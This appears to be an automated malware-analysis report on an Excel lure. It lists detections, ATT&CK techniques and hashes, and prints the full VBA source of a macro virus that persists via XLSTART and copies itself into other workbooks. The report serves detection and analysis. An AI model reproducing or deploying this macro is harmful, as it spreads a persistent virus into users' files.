MALICIOUS (Risk Score: 188)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel document containing VBA macros, specifically an Auto_Open macro. This macro is designed to copy itself to the Excel startup directory ('XLSTART') as 'mypersonnel.xls'. This action establishes persistence, ensuring the malicious macro executes every time Microsoft Excel is launched. The document body appears to be a legitimate project deployment schedule, likely used as a lure.
Heuristics (4)
- ClamAV: Xls.Virus.Valyria-10004391-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Virus.Valyria-10004391-0
- VBA project inside OOXML (medium, OOXML_VBA, 1 related finding): Document contains a VBA project — VBA macros present
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Hidden worksheet (veryHidden) (low, OOXML_HIDDEN_SHEET): Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1304 bytes |

SHA-256: 3521c9120c3d6f6198577135f38f2fd19b399dd53636d28342651a276b50413f

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 17408 bytes |

SHA-256: f4464192d111fa7812a3038544056963ed8c051b6936bfb83944e7c0f003fa21

Detection
- ClamAV: Xls.Virus.Valyria-10004391-0
- Obfuscation or payload: unlikely